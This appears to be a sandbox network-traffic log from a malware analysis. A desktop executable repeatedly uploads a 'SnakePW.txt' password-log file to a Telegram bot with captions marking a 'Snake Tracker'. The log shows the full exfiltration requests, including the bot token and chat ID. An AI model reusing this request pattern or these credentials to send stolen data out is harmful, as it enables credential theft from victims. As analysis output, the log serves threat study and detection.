2024-09-27 10:52:42 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcdff6fdc70f1b Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:52:42 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 66 36 66 64 63 37 30 66 31 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcdff6fdc70f1bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:42 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:42 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:42 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 38 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 36 32 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36897,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434362,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49731	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:43 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce002e85bc292 Host: api.telegram.org Content-Length: 551
2024-09-27 10:52:43 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 30 32 65 38 35 62 63 32 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce002e85bc292Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:44 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:44 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:44 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 38 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 36 34 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36898,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434364,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49732	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:45 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce0195b0da5d3 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:52:45 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 31 39 35 62 30 64 61 35 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce0195b0da5d3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:45 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:45 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:45 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 38 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 36 35 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36899,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434365,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49733	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:46 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce01d4f2c9ecb Host: api.telegram.org Content-Length: 551
2024-09-27 10:52:46 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 31 64 34 66 32 63 39 65 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce01d4f2c9ecbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:46 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:46 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:46 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 36 36 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36900,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434366,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49734	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:47 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce027d4260ea1 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:52:47 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 32 37 64 34 32 36 30 65 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce027d4260ea1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:47 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:47 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:47 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 36 37 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36901,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434367,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49735	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:48 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce033a491270e Host: api.telegram.org Content-Length: 551
2024-09-27 10:52:48 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 33 33 61 34 39 31 32 37 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce033a491270eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:48 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:48 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 36 38 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36902,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434368,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49736	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:49 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce03e206a8b7c Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:52:49 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 33 65 32 30 36 61 38 62 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce03e206a8b7cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:52:49 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:52:49 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:52:49 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 33 36 39 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36903,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434369,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49737	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:50 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dce04897de117b Host: api.telegram.org Content-Length: 551
2024-09-27 10:52:50 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 34 38 39 37 64 65 31 31 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dce04897de117bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
